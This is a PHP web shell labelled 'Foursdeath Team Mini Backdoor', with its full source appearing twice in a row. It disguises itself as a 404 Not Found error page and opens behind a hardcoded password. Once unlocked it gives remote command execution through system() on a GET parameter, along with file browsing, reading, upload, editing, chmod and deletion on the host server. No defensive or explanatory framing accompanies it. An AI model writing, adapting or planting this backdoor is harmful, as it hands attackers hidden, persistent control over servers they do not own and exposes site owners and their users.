<?php 

// Priv Shell 

// Silence Because Yourself

​

error_reporting(0);

header('HTTP/1.0 404 Not Found', true, 404);

session_start();

$pass = "fsdth2018";

$link = "fvck.txt";

if($_POST['password'] == $pass) {

  $_SESSION['forbidden'] = $pass;

  echo "<script>window.location='?zet'</script>";

}

if($_GET['page'] == "blank") {

  echo "<a href='?'>Back</a>";

  exit();

}

if(isset($_REQUEST['logout'])) {

  session_destroy();

  echo "<script>window.location='?zet'</script>";

}

if(!($_SESSION['forbidden'])) {

?>

<title>404 Not Found</title>

<meta name="theme color" content="black"> </meta>

<link href="https://fonts.googleapis.com/css?family=Patrick+Hand" rel="stylesheet">

<link href="https://fonts.googleapis.com/css?family=Oxanium&display=swap" rel="stylesheet">

​

<html>

<head>

    <title>Tak Terlihat Shell</title>

<meta charset="UTF-8"> <meta name="Author" content="Zildan-Sec" /> <meta name="copyright" content="|I<3U|" /<meta name="description" content="Cowok Tersakiti Team" />

</head>

<style>

    input { margin:0;background-color:#fff;border:1px solid #fff; }

</style>

<body bgcolor="white">

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<p>Additionally, a 404 Not Found

error was encountered while trying to use an ErrorDocument to handle the request.</p>

​

    <form method="post">

        <input type="password" name="password" placeholder="">

        <br>

        <br>

        <?php echo $_SESSIOM['forbidden']; ?>

        </form>

      </td>

     </table>

​

<?php 

​

exit();

}

 ?>

<?php

error_reporting(0);

set_time_limit(0);

​

if(get_magic_quotes_gpc()){

foreach($_POST as $key=>$value){

$_POST[$key] = stripslashes($value);

}

}

echo '<!doctype html>

<html>

<head>

<title>Foursdeath Team Mini Backdoor</title>

</head>';

​

?>

​

<style> 

body {

background: #000000;

line-height: 1;

color: #fff;

font-family: Kelly Slab;

​

}

h4{

    font-family: monospace;

    background: black;

    color: white;

    font-size: 20px;

    border: 1px solid lime;

    border-radius: 10px;

}

p{

    text-align: center;

    color: red;

    font-family: Courier;

    font-size: 3vh;

    background: black;

}

th{

    background:red;

color: black;

}

table, td {

    border-collapse:collapse;

    background: transparent;

        font-family: monospace;

    font-size: 14px;

        background-image: url(https://f.top4top.io/p_1952sduqc0.png);

        background-repeat: no-repeat;

        background-attachment: fixed;

        background-size: 100%  100%;  

border: 1px solid gold; 

padding: 0px; 

}

input{

    background-color: black;

    font-family: monospace;

    font-size: 15px;

color: white;

border: 1px solid white;

text-shadow: 5px 5px 30px darkred;

}

textarea { 

font-family: monospace ; 

}

.table_home, .th_home, .td_home{ 

color:white;

border: 1px solid red;

}

th {

    padding: 10px;

}

.td_home { padding: 7px; }

select {font-family: Comic Sans MS }

a {color:white}

textarea { width: 100%;height: 400px; }

</style>

<?php

​

echo '</head>

<body><b>

<p>FOURSDEATH TEAM <font color="white">SHELL</p></font>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font color="white"><center>'.php_uname().'</center></font><br>';

if(isset($_GET['path'])){

$path = $_GET['path'];

}else{

$path = 

​

​

getcwd();

​

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

​

foreach($paths as $id=>$pat){

if($pat == '' && $id == 0){

$a = true;

echo '<font color=#fff><center><center>Current Path: <a href="?path=/">/</a>';

continue;

}

if($pat == '') continue;

echo '<a href="?path=';

for($i=0;$i<=$id;$i++){

echo "$paths[$i]";

if($i != $id) echo "/";

}

echo '">'.$pat.'</a>/';

}

echo '</font></center></td></tr><tr><td><center>';

if(isset($_FILES['file'])){

if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

echo '<font color="green">Upload Succes</font><br />';

}else{

echo '<font color="red">Upload Failed !!</font><br />';

}

}

echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />

<input type="submit" value="Upload" />

</form></center>

</td></tr>';

if(isset($_GET['filesrc'])){

echo "<tr><td><center>Current File : ";

echo $_GET['filesrc'];

echo '</center></tr></td></table><br />';

echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');

}

//Empety

elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){

echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

//Chmod

if($_GET['opt'] == 'chmod'){

if(isset($_POST['perm'])){

if(chmod($_POST['path'],$_POST['perm'])){

echo '<font color="green">Change Permission Done </font><br />';

}else{

echo '<font color="red">Change Permission Error </font><br />';

}

}

​

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

echo '<form method="POST">

Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />

<input type="hidden" name="path" value="'.$_POST['path'].'">

<input type="hidden" name="opt" value="chmod">

<input type="submit" value="Save" />

</form>';

}

//

elseif($_GET['opt'] == 'btw'){

    $cwd = getcwd();

     echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">

New Name : <input name="name" type="text" size="20" value="Folder" />

<input type="hidden" name="path" value="'.$cwd.'">

<input type="hidden" name="opt" value="delete">

<input type="submit" value="Save" />

</form>';

}

elseif($_GET['opt'] == 'rename'){

if(isset($_POST['newname'])){

if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

echo '<font color="green">Change Name Done </font><br />';

}else{

echo '<font color="red">Change Name Error </font><br />';

}

$_POST['name'] = $_POST['newname'];

}

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

$new = $_POST['newname'];

​

echo '<form method="POST">

New Name : <input name="newname" type="text" size="20" value="'.$new.'" />

<input type="hidden" name="path" value="'.$patc.'">

<input type="hidden" name="opt" value="rename">

<input type="submit" value="Save" />

</form>';

}

elseif($_GET['opt'] == 'baru'){

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

$new = $_POST['newname'];

$azz = $_POST['path'];

$newz = "$azz/$new";

​

​

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '<font color="green">Create File Done [ '.$new.' ]</font><br />';

}else{

echo '<font color="red">Create File Error</font><br />';

}

fclose($fp);

}

​

echo '<form method="POST"> Name : <input name="nama" type="text" size="20" value="'.$new.'" /><input type="submit" name="namaa" value="Create"/></form><br> ';

​

$ho = $_POST['nama'];

​

if(isset($_POST['namaa'])){

echo '<form method="POST">

<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />

<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">

<input type="hidden" name="opt" value="edit">

<input type="submit" value="Save" />

</form>';

    }

    }

elseif($_GET['opt'] == 'edit'){

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '<font color="green">Edit File Done </font><br />';

}else{

echo '<font color="red">Edit File Error </font><br />';

}

fclose($fp);

}

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

echo '<form method="POST">

<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />

<input type="hidden" name="path" value="'.$patc.'">

<input type="hidden" name="opt" value="edit">

<input type="submit" value="Save" />

</form>';

}

echo '</center>';

}else{

echo '</table><br /><center>';

if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

//Delete dir

if($_GET['type'] == 'dir'){

​

if(rmdir($patc)){

echo '<font color="green">Delete File Done</font><br />';

}else{

echo '<font color="red#">Delete File Error </font><br />';

}

}

if($_GET['type'] == 'buat'){

$haaa = $_POST['path'];

$heee = $_POST['name'];

$hooo = "$haaa/$heee";

$new = $haaa.'/'.htmlspecialchars($heee);

if(!mkdir($new)){

echo '<font color="red">Create Folder Error</font><br />';

}else{

echo '<font color="green">Create Folder Done </font><br />';

}

}

elseif($_GET['type'] == 'file'){

​

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

if(unlink($patc)){

echo '<font color="green">Delete File Done</font><br />';

}else{

echo '<font color="red#">Delete File Error </font><br />';

}

}

}

echo '</center>';

?>

<form><font color="white">

  <label for="cmd">fsdth@localhost:~$ </label>

  <input type="text" name="cmd" placeholder="_" /></font>

  </form>

​

</body>

<font color="white" size="5">

<?php

  if(isset($_GET['cmd'])){

      echo "<pre>";

      echo system($_GET['cmd']);

      echo "</pre>";

  }

​

?>

<?

$scandir = scandir($path);

$pa = getcwd();

echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">

<tr>

<th class=th_home><center>File</center></th>

<th class=th_home><center>Size</center></th>

<th class=th_home><center>Perm</center></th>

<th class=th_home><center>Action</center></th>

</tr> <tr>

<td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">New File    </a> <a href="?option&path='.$pa.'&opt=btw&type=dir">     New Dir</a> </td></tr>

';

​

foreach($scandir as $dir){

if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

echo "

<tr>

<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=' width='15px' height='15px'> <a href=\"?path=$path/$dir\">$dir</a></td>

<td class=td_home ><center>DIR</center></td>

<td class=td_home ><center>";

if(is_writable("$path/$dir")) echo '<font color="green">';

elseif(!is_readable("$path/$dir")) echo '<font color="red">';

echo perms("$path/$dir");

if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

​

echo "</center></td>

<td class=td_home ><center>

<a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>

</center></td>

</tr>";

}

echo '<br>';

foreach($scandir as $file){

if(!is_file("$path/$file")) continue;

$size = filesize("$path/$file")/1024;

$size = round($size,3);

if($size >= 1024){

$size = round($size/1024,2).' MB';

}else{

$size = $size.' KB';

}

​

echo "<tr>

<td class=td_home > <img src='http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/file-text-icon.png' width='15px' height='15'> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

<td class=td_home><center>".$size."</center></td>

<td class=td_home><center>";

if(is_writable("$path/$file")) echo '<font color="green">';

elseif(!is_readable("$path/$file")) echo '<font color="red">';

echo perms("$path/$file");

if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

echo "</center></td>

<td class=td_home><center>

<a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>

</center></td>

</tr>";

}

echo '</table>

</div>';

}

echo '<br><center><h4>Fsdth 2k18 - Mini Backdoor</h4></b></body>

</html>';

function perms($file){

$perms = fileperms($file);

​

if (($perms & 0xC000) == 0xC000) {

// Socket

$info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link

$info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

// Regular

$info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

// Block special

$info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

// Directory

$info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

// Character special

$info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

// FIFO pipe

$info = 'p';

} else {

// Unknown

$info = 'u';

}

​

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

(($perms & 0x0800) ? 's' : 'x' ) :

(($perms & 0x0800) ? 'S' : '-'));

​

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

(($perms & 0x0400) ? 's' : 'x' ) :

(($perms & 0x0400) ? 'S' : '-'));

​

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

(($perms & 0x0200) ? 't' : 'x' ) :

(($perms & 0x0200) ? 'T' : '-'));

​

return $info;

}

​

?><?php 

// Priv Shell 

// Silence Because Yourself

​

error_reporting(0);

header('HTTP/1.0 404 Not Found', true, 404);

session_start();

$pass = "fsdth2018";

$link = "fvck.txt";

if($_POST['password'] == $pass) {

  $_SESSION['forbidden'] = $pass;

  echo "<script>window.location='?zet'</script>";

}

if($_GET['page'] == "blank") {

  echo "<a href='?'>Back</a>";

  exit();

}

if(isset($_REQUEST['logout'])) {

  session_destroy();

  echo "<script>window.location='?zet'</script>";

}

if(!($_SESSION['forbidden'])) {

?>

<title>404 Not Found</title>

<meta name="theme color" content="black"> </meta>

<link href="https://fonts.googleapis.com/css?family=Patrick+Hand" rel="stylesheet">

<link href="https://fonts.googleapis.com/css?family=Oxanium&display=swap" rel="stylesheet">

​

<html>

<head>

    <title>Tak Terlihat Shell</title>

<meta charset="UTF-8"> <meta name="Author" content="Zildan-Sec" /> <meta name="copyright" content="|I<3U|" /<meta name="description" content="Cowok Tersakiti Team" />

</head>

<style>

    input { margin:0;background-color:#fff;border:1px solid #fff; }

</style>

<body bgcolor="white">

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<p>Additionally, a 404 Not Found

error was encountered while trying to use an ErrorDocument to handle the request.</p>

​

    <form method="post">

        <input type="password" name="password" placeholder="">

        <br>

        <br>

        <?php echo $_SESSIOM['forbidden']; ?>

        </form>

      </td>

     </table>

​

<?php 

​

exit();

}

 ?>

<?php

error_reporting(0);

set_time_limit(0);

​

if(get_magic_quotes_gpc()){

foreach($_POST as $key=>$value){

$_POST[$key] = stripslashes($value);

}

}

echo '<!doctype html>

<html>

<head>

<title>Foursdeath Team Mini Backdoor</title>

</head>';

​

?>

​

<style> 

body {

background: #000000;

line-height: 1;

color: #fff;

font-family: Kelly Slab;

​

}

h4{

    font-family: monospace;

    background: black;

    color: white;

    font-size: 20px;

    border: 1px solid lime;

    border-radius: 10px;

}

p{

    text-align: center;

    color: red;

    font-family: Courier;

    font-size: 3vh;

    background: black;

}

th{

    background:red;

color: black;

}

table, td {

    border-collapse:collapse;

    background: transparent;

        font-family: monospace;

    font-size: 14px;

        background-image: url(https://f.top4top.io/p_1952sduqc0.png);

        background-repeat: no-repeat;

        background-attachment: fixed;

        background-size: 100%  100%;  

border: 1px solid gold; 

padding: 0px; 

}

input{

    background-color: black;

    font-family: monospace;

    font-size: 15px;

color: white;

border: 1px solid white;

text-shadow: 5px 5px 30px darkred;

}

textarea { 

font-family: monospace ; 

}

.table_home, .th_home, .td_home{ 

color:white;

border: 1px solid red;

}

th {

    padding: 10px;

}

.td_home { padding: 7px; }

select {font-family: Comic Sans MS }

a {color:white}

textarea { width: 100%;height: 400px; }

</style>

<?php

​

echo '</head>

<body><b>

<p>FOURSDEATH TEAM <font color="white">SHELL</p></font>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font color="white"><center>'.php_uname().'</center></font><br>';

if(isset($_GET['path'])){

$path = $_GET['path'];

}else{

$path = 

​

​

getcwd();

​

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

​

foreach($paths as $id=>$pat){

if($pat == '' && $id == 0){

$a = true;

echo '<font color=#fff><center><center>Current Path: <a href="?path=/">/</a>';

continue;

}

if($pat == '') continue;

echo '<a href="?path=';

for($i=0;$i<=$id;$i++){

echo "$paths[$i]";

if($i != $id) echo "/";

}

echo '">'.$pat.'</a>/';

}

echo '</font></center></td></tr><tr><td><center>';

if(isset($_FILES['file'])){

if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

echo '<font color="green">Upload Succes</font><br />';

}else{

echo '<font color="red">Upload Failed !!</font><br />';

}

}

echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />

<input type="submit" value="Upload" />

</form></center>

</td></tr>';

if(isset($_GET['filesrc'])){

echo "<tr><td><center>Current File : ";

echo $_GET['filesrc'];

echo '</center></tr></td></table><br />';

echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');

}

//Empety

elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){

echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

//Chmod

if($_GET['opt'] == 'chmod'){

if(isset($_POST['perm'])){

if(chmod($_POST['path'],$_POST['perm'])){

echo '<font color="green">Change Permission Done </font><br />';

}else{

echo '<font color="red">Change Permission Error </font><br />';

}

}

​

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

echo '<form method="POST">

Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />

<input type="hidden" name="path" value="'.$_POST['path'].'">

<input type="hidden" name="opt" value="chmod">

<input type="submit" value="Save" />

</form>';

}

//

elseif($_GET['opt'] == 'btw'){

    $cwd = getcwd();

     echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">

New Name : <input name="name" type="text" size="20" value="Folder" />

<input type="hidden" name="path" value="'.$cwd.'">

<input type="hidden" name="opt" value="delete">

<input type="submit" value="Save" />

</form>';

}

elseif($_GET['opt'] == 'rename'){

if(isset($_POST['newname'])){

if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

echo '<font color="green">Change Name Done </font><br />';

}else{

echo '<font color="red">Change Name Error </font><br />';

}

$_POST['name'] = $_POST['newname'];

}

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

$new = $_POST['newname'];

​

echo '<form method="POST">

New Name : <input name="newname" type="text" size="20" value="'.$new.'" />

<input type="hidden" name="path" value="'.$patc.'">

<input type="hidden" name="opt" value="rename">

<input type="submit" value="Save" />

</form>';

}

elseif($_GET['opt'] == 'baru'){

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

$new = $_POST['newname'];

$azz = $_POST['path'];

$newz = "$azz/$new";

​

​

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '<font color="green">Create File Done [ '.$new.' ]</font><br />';

}else{

echo '<font color="red">Create File Error</font><br />';

}

fclose($fp);

}

​

echo '<form method="POST"> Name : <input name="nama" type="text" size="20" value="'.$new.'" /><input type="submit" name="namaa" value="Create"/></form><br> ';

​

$ho = $_POST['nama'];

​

if(isset($_POST['namaa'])){

echo '<form method="POST">

<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />

<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">

<input type="hidden" name="opt" value="edit">

<input type="submit" value="Save" />

</form>';

    }

    }

elseif($_GET['opt'] == 'edit'){

if(isset($_POST['src'])){

$fp = fopen($_POST['path'],'w');

if(fwrite($fp,$_POST['src'])){

echo '<font color="green">Edit File Done </font><br />';

}else{

echo '<font color="red">Edit File Error </font><br />';

}

fclose($fp);

}

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

echo '<form method="POST">

<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />

<input type="hidden" name="path" value="'.$patc.'">

<input type="hidden" name="opt" value="edit">

<input type="submit" value="Save" />

</form>';

}

echo '</center>';

}else{

echo '</table><br /><center>';

if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

//Delete dir

if($_GET['type'] == 'dir'){

​

if(rmdir($patc)){

echo '<font color="green">Delete File Done</font><br />';

}else{

echo '<font color="red#">Delete File Error </font><br />';

}

}

if($_GET['type'] == 'buat'){

$haaa = $_POST['path'];

$heee = $_POST['name'];

$hooo = "$haaa/$heee";

$new = $haaa.'/'.htmlspecialchars($heee);

if(!mkdir($new)){

echo '<font color="red">Create Folder Error</font><br />';

}else{

echo '<font color="green">Create Folder Done </font><br />';

}

}

elseif($_GET['type'] == 'file'){

​

$hell = $_GET['path'];

$yeah = $_GET['name'];

$patc = "$hell/$yeah";

​

if(unlink($patc)){

echo '<font color="green">Delete File Done</font><br />';

}else{

echo '<font color="red#">Delete File Error </font><br />';

}

}

}

echo '</center>';

?>

<form><font color="white">

  <label for="cmd">fsdth@localhost:~$ </label>

  <input type="text" name="cmd" placeholder="_" /></font>

  </form>

​

</body>

<font color="white" size="5">

<?php

  if(isset($_GET['cmd'])){

      echo "<pre>";

      echo system($_GET['cmd']);

      echo "</pre>";

  }

​

?>

<?

$scandir = scandir($path);

$pa = getcwd();

echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">

<tr>

<th class=th_home><center>File</center></th>

<th class=th_home><center>Size</center></th>

<th class=th_home><center>Perm</center></th>

<th class=th_home><center>Action</center></th>

</tr> <tr>

<td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">New File    </a> <a href="?option&path='.$pa.'&opt=btw&type=dir">     New Dir</a> </td></tr>

';

​

foreach($scandir as $dir){

if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

echo "

<tr>

<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=' width='15px' height='15px'> <a href=\"?path=$path/$dir\">$dir</a></td>

<td class=td_home ><center>DIR</center></td>

<td class=td_home ><center>";

if(is_writable("$path/$dir")) echo '<font color="green">';

elseif(!is_readable("$path/$dir")) echo '<font color="red">';

echo perms("$path/$dir");

if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

​

echo "</center></td>

<td class=td_home ><center>

<a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>

</center></td>

</tr>";

}

echo '<br>';

foreach($scandir as $file){

if(!is_file("$path/$file")) continue;

$size = filesize("$path/$file")/1024;

$size = round($size,3);

if($size >= 1024){

$size = round($size/1024,2).' MB';

}else{

$size = $size.' KB';

}

​

echo "<tr>

<td class=td_home > <img src='http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/file-text-icon.png' width='15px' height='15'> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

<td class=td_home><center>".$size."</center></td>

<td class=td_home><center>";

if(is_writable("$path/$file")) echo '<font color="green">';

elseif(!is_readable("$path/$file")) echo '<font color="red">';

echo perms("$path/$file");

if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

echo "</center></td>

<td class=td_home><center>

<a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>

</center></td>

</tr>";

}

echo '</table>

</div>';

}

echo '<br><center><h4>Fsdth 2k18 - Mini Backdoor</h4></b></body>

</html>';

function perms($file){

$perms = fileperms($file);

​

if (($perms & 0xC000) == 0xC000) {

// Socket

$info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link

$info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

// Regular

$info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

// Block special

$info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

// Directory

$info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

// Character special

$info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

// FIFO pipe

$info = 'p';

} else {

// Unknown

$info = 'u';

}

​

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

(($perms & 0x0800) ? 's' : 'x' ) :

(($perms & 0x0800) ? 'S' : '-'));

​

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

(($perms & 0x0400) ? 's' : 'x' ) :

(($perms & 0x0400) ? 'S' : '-'));

​

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

(($perms & 0x0200) ? 't' : 'x' ) :

(($perms & 0x0200) ? 'T' : '-'));

​

return $info;

}

​